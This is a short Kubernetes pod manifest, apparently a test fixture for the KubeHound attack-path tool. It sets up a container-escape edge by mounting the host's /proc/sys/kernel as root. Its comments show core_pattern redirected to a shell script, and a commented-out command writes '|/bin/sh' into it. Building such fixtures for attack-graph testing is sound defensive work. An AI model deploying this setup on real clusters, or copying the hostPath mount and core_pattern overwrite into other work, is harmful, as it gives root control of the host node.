# CE_UMH_CORE_PATTERN edge
# creates
# root@umh-core-pod:~# cat /sysproc/core_pattern
# |/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1009/fs/tmp/shell.sh
apiVersion: v1
kind: Pod
metadata:
  name: umh-core-pod
  labels:
    app: kubehound-edge-test
spec:
  containers:
    - name: umh-core-container
      image: entlein/ce-umh-core-pattern:0.0.1
      imagePullPolicy: Always
      volumeMounts:
      - mountPath: /sysproc
        name: nodeproc
      #command: [ "/bin/sh", "-c", "--" ]
      #args: [ "echo '|/bin/sh' > /sysproc/core_pattern && while true; do sleep 300; done;" ]
      securityContext:
        runAsUser: 0
  volumes:
    - name: nodeproc
      hostPath:
        path: /proc/sys/kernel
